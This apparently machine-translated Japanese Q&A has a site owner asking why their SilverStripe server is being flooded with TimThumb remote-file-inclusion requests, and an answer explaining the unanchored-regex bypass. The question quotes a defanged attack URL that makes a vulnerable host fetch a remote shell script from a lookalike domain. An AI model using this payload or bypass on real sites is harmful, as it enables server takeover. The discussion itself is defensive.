別のサーバー経由でのリモートファイルのインクルード

Question

私のサーバ（mediaquarter.at）は、このようなリクエスト（現在はいくつかの小さなバリエーションがあります）によって現在DDoSされています：hXXp：//www.mediaquarter.at/http：//www.madeineurope.org.uk/media/functions/ timthumb/timthumb.php？src = http：//blogger.com.midislandrental.com/.mods/sh.php（誰も誤ってクリックすることがないようにURL「非アクティブ化」）

参照されるPHPファイル：preg_replaceには/ eスイッチが有効になっていて、コードには複数のeval文が含まれています。 http://www.offensivecomputing.net/?q=node/1417

TimThumbはリモートファイルのインクルードに脆弱です（http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability- botnet-recruitment-vector /）として使用されています - WordPressでかなり普及しているようです。だから、私はhXXP：//www.madeineurope.org.uk/media/functions/timthumb/timthumb.php？src = http：//blogger.com.midislandrental.com/.mods/sh.phpを呼び出す人を理解するだろう脆弱性。

しかし、別のウェブサイト（mediaquarter.at）で呼び出すと、404エラーメッセージだけが表示されます。さらに、私のサーバーはWordPressを実行していませんが、代わりにSilverStripeを使用しているので、これはかなり無意味です。

これは攻撃側のエラー/愚かなのでしょうか、ここで何らかの攻撃方法が見落とされていますか？

PS：サーバーはちょうど安価なWebホスティングで、私はまったく手元に届かないので、システムに変更があるかどうか確認できません。

Answer 1

timthumb.phpファイルをお持ちでない場合は、平らで簡単な脆弱性はありません。これは非常にエキゾチックな脆弱性であり、私が深く勉強したのは、（今のところ）一種だからです。 attacker's point of viewから書かれたthe exploitsとお読みください。

つまり、youtube.comやblogger.comのような「信頼できる」ウェブサイトからのキャッシング画像です。しかし、この正規表現はあまり書かれておらず、文字列の最後には束縛されていません。この正規表現チェックをだますためにあなたのサブドメインを変更するのは些細なことです。このため、攻撃者のドメイン名はblogger.com.midislandrental.comです。

あなたがDDoS攻撃を受けている理由は、timthumb.phpのフェッチが404を返さないか、timthumb.phpを介して広がっている大規模なボットネットがあなたに脆弱であると間違って指紋を付けているためです。あなたは脆弱なホストを見つけようとしているボットのためにGoogle Dorkに表示される可能性があります。